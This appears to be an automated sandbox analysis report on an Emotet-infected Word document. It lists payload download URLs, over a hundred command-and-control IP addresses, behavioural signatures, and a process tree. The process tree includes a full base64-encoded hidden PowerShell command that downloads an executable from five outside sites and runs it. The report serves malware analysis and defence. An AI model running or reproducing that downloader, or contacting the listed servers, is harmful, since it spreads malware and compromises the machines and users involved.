Analysis
-
max time kernel
146s -
resource
win10v191014 -
submitted
20-12-2019 04:56
Task
task1
Sample
Docs_8a1b1714e1ae0fabcf590df96af964ab.15.doc
Resource
win7v191014
General
Malware Config
Extracted
https://fanitv.com/sandbox/oQmLZD/
http://bicheru-cycling.ro/bbr/IEScmzh/
http://lesdebatsdecouzon.org/lddc/7wpe2-kckbz4za-25568/
https://4vetcbd.com/cgi-bin/CqCjQxYqx/
http://zlatebenz.mk/wp-content/6nlkz6y-lmfk-9136296721/
Extracted
emotet
98.178.241.106:80
190.171.153.139:80
179.5.118.12:8080
45.79.75.232:8080
124.150.175.133:80
164.68.115.146:8080
5.189.148.98:8080
46.105.128.215:8080
67.254.196.78:443
95.216.207.86:7080
181.46.176.38:80
98.15.140.226:80
217.12.70.226:80
115.179.91.58:80
41.190.148.90:80
162.144.46.90:8080
211.218.105.101:80
212.129.14.27:8080
120.51.83.89:443
200.41.121.69:443
81.82.247.216:80
138.197.140.163:8080
190.5.162.204:80
85.109.190.235:443
216.75.37.196:8080
41.77.74.214:443
86.6.123.109:80
203.160.173.202:80
211.48.165.9:443
158.69.167.246:8080
46.17.6.116:8080
24.27.122.202:80
177.103.240.93:80
110.142.161.90:80
108.184.9.44:80
46.105.131.68:8080
211.42.204.154:80
37.59.24.25:8080
89.215.225.15:80
23.253.207.142:8080
190.38.252.45:443
50.116.78.109:8080
94.203.236.122:80
86.70.224.211:80
174.57.150.13:8080
37.70.131.107:80
156.155.163.232:80
212.112.113.235:80
85.235.219.74:80
51.77.113.97:8080
78.46.87.133:8080
200.71.112.158:53
201.196.15.79:990
190.161.67.63:80
112.186.195.176:80
82.146.55.23:7080
78.187.204.70:80
188.230.134.205:80
189.61.200.9:443
195.250.143.182:80
37.46.129.215:8080
185.244.167.25:443
58.93.151.148:80
66.229.161.86:443
100.38.11.243:80
92.16.222.156:80
175.127.140.68:80
201.183.251.100:80
59.158.164.66:443
175.103.239.50:80
203.153.216.178:7080
154.120.227.190:443
124.150.175.129:8080
51.38.134.203:8080
72.27.212.209:8080
210.224.65.117:80
128.92.54.20:80
91.117.31.181:80
69.30.205.162:7080
142.93.87.198:8080
78.186.102.195:80
210.171.146.118:80
177.144.130.105:443
178.134.1.238:80
189.225.211.171:443
190.93.210.113:80
220.78.29.88:80
165.100.148.200:8080
72.51.153.27:80
95.216.212.157:8080
191.100.24.201:50000
187.250.92.82:80
58.185.224.18:80
217.181.139.237:443
83.156.88.159:80
221.154.59.110:80
82.79.244.92:80
197.94.32.129:8080
181.167.35.84:80
42.51.192.231:8080
113.52.135.33:7080
190.17.94.108:443
192.210.217.94:8080
190.47.236.83:80
176.58.93.123:80
95.9.217.200:8080
139.59.12.63:8080
96.234.38.186:8080
82.165.15.188:8080
193.33.38.208:443
88.247.26.78:80
87.9.181.247:80
86.98.157.3:80
192.161.190.171:8080
110.2.118.164:80
95.255.140.89:443
41.111.190.94:80
163.172.97.112:8080
186.84.173.136:8080
210.111.160.220:80
182.176.116.139:995
172.104.70.207:8080
24.28.178.71:80
190.101.87.170:80
192.241.220.183:8080
91.117.131.122:80
69.14.208.221:80
Signatures
-
Process spawned unexpected child process 1 IoCs
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4264 4928 Powershell.exe 70 -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 4264 Powershell.exe 4244 boostmonthly.exe -
Executes dropped EXE 4 IoCs
pid Process 4356 662.exe 3704 662.exe 4008 boostmonthly.exe 4244 boostmonthly.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\SERVIC~2\LOCALS~1\AppData\Local\Temp\MpCmdRun.log mpcmdrun.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 4264 wrote to memory of 4356 4264 Powershell.exe 79 PID 4356 wrote to memory of 3704 4356 662.exe 80 PID 4008 wrote to memory of 4244 4008 boostmonthly.exe 82 -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 4992 WINWORD.EXE -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 4992 WINWORD.EXE -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 4264 Powershell.exe -
Drops file in System32 directory 6 IoCs
description ioc Process File renamed C:\Users\Admin\662.exe => C:\Windows\SysWOW64\boostmonthly.exe 662.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat boostmonthly.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 boostmonthly.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE boostmonthly.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies boostmonthly.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 boostmonthly.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 4992 WINWORD.EXE 4356 662.exe 3704 662.exe 4008 boostmonthly.exe 4244 boostmonthly.exe -
Suspicious behavior: EmotetMutantsSpam 2 IoCs
pid Process 3704 662.exe 4244 boostmonthly.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Docs_8a1b1714e1ae0fabcf590df96af964ab.15.doc" /o ""1⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:4992
-
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exePowershell -w hidden -en JABHAHYAYQB1AG4AcQBiAHgAYgBwAHkAYQB5AD0AJwBUAGcAbQBqAHcAbQBwAGgAdAByAHYAJwA7ACQASABlAHQAZQB6AG4AZQBjAHcAbwBrAGMAIAA9ACAAJwA2ADYAMgAnADsAJABPAGYAbAB4AGIAdAByAG4AcgBmAGcAcwA9ACcARABmAHkAcABiAG8AZABpACcAOwAkAFEAbwBkAHEAbwBrAHcAYQBtAG8AbQB0AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABIAGUAdABlAHoAbgBlAGMAdwBvAGsAYwArACcALgBlAHgAZQAnADsAJABRAGoAcQBuAGgAZAByAHoAbgBmAG0AawA9ACcAWABpAHcAZgBvAGcAZABkACcAOwAkAEcAYwBmAGkAcQBqAGMAcABhAHcAPQAmACgAJwBuACcAKwAnAGUAdwAtAG8AJwArACcAYgBqAGUAYwAnACsAJwB0ACcAKQAgAG4ARQBUAC4AdwBlAGIAQwBsAEkARQBuAFQAOwAkAFcAbAByAG0AZgBmAG0AawB2AGMAPQAnAGgAdAB0AHAAcwA6AC8ALwBmAGEAbgBpAHQAdgAuAGMAbwBtAC8AcwBhAG4AZABiAG8AeAAvAG8AUQBtAEwAWgBEAC8AKgBoAHQAdABwADoALwAvAGIAaQBjAGgAZQByAHUALQBjAHkAYwBsAGkAbgBnAC4AcgBvAC8AYgBiAHIALwBJAEUAUwBjAG0AegBoAC8AKgBoAHQAdABwADoALwAvAGwAZQBzAGQAZQBiAGEAdABzAGQAZQBjAG8AdQB6AG8AbgAuAG8AcgBnAC8AbABkAGQAYwAvADcAdwBwAGUAMgAtAGsAYwBrAGIAegA0AHoAYQAtADIANQA1ADYAOAAvACoAaAB0AHQAcABzADoALwAvADQAdgBlAHQAYwBiAGQALgBjAG8AbQAvAGMAZwBpAC0AYgBpAG4ALwBDAHEAQwBqAFEAeABZAHEAeAAvACoAaAB0AHQAcAA6AC8ALwB6AGwAYQB0AGUAYgBlAG4AegAuAG0AawAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwA2AG4AbABrAHoANgB5AC0AbABtAGYAawAtADkAMQAzADYAMgA5ADYANwAyADEALwAnAC4AIgBTAHAAYABsAGkAVAAiACgAJwAqACcAKQA7ACQARQBuAHMAZwBwAHoAbwBnAGgAdABoAD0AJwBEAGcAbwBvAGgAZgBlAHAAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFQAZgBnAHEAdAB1AGIAeABxACAAaQBuACAAJABXAGwAcgBtAGYAZgBtAGsAdgBjACkAewB0AHIAeQB7ACQARwBjAGYAaQBxAGoAYwBwAGEAdwAuACIAZABPAHcAbgBsAG8AYQBgAGQAZgBgAGkAbABFACIAKAAkAFQAZgBnAHEAdAB1AGIAeABxACwAIAAkAFEAbwBkAHEAbwBrAHcAYQBtAG8AbQB0ACkAOwAkAFcAcgB0AHMAeAB0AHEAcABtAGcAZABqAD0AJwBMAGoAbwByAGcAYwB0AHYAZgBmACcAOwBJAGYAIAAoACgALgAoACcARwAnACsAJwBlACcAKwAnAHQALQBJAHQAZQBtACcAKQAgACQAUQBvAGQAcQBvAGsAdwBhAG0AbwBtAHQAKQAuACIATABFAE4AYABHAFQASAAiACAALQBnAGUAIAAzADQAMwA1ADkAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAUwBUAGAAQQBSAFQAIgAoACQAUQBvAGQAcQBvAGsAdwBhAG0AbwBtAHQAKQA7ACQAUwB2AHgAeQB4AGsAdQB3AD0AJwBHAHEAbgBxAGUAdQBsAHoAdQBsAGQAYwB4ACcAOwBiAHIAZQBhAGsAOwAkAEoAcQB6AGIAbQBvAHoAeQB0AHkAdAA9ACcARwB5AHoAbwB3AG4AaABhAHQAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAQQB0AGYAeABuAHcAcQB4AGcAbABvAD0AJwBWAGIAaABoAHMAdABzAGsAZgBkAHQAdwAnAA==1⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
PID:4264 -
C:\Users\Admin\662.exe"C:\Users\Admin\662.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
- Suspicious use of SetWindowsHookEx
PID:4356 -
C:\Users\Admin\662.exe--2a4aec103⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
- Suspicious behavior: EmotetMutantsSpam
PID:3704
-
-
-
C:\Windows\SysWOW64\boostmonthly.exe"C:\Windows\SysWOW64\boostmonthly.exe"1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
- Suspicious use of SetWindowsHookEx
PID:4008 -
C:\Windows\SysWOW64\boostmonthly.exe--cc1fc81c2⤵
- Suspicious behavior: EnumeratesProcesses
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
- Suspicious behavior: EmotetMutantsSpam
PID:4244
-
-
C:\Program Files\Windows Defender\mpcmdrun.exe"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable1⤵
- Drops file in Windows directory
PID:372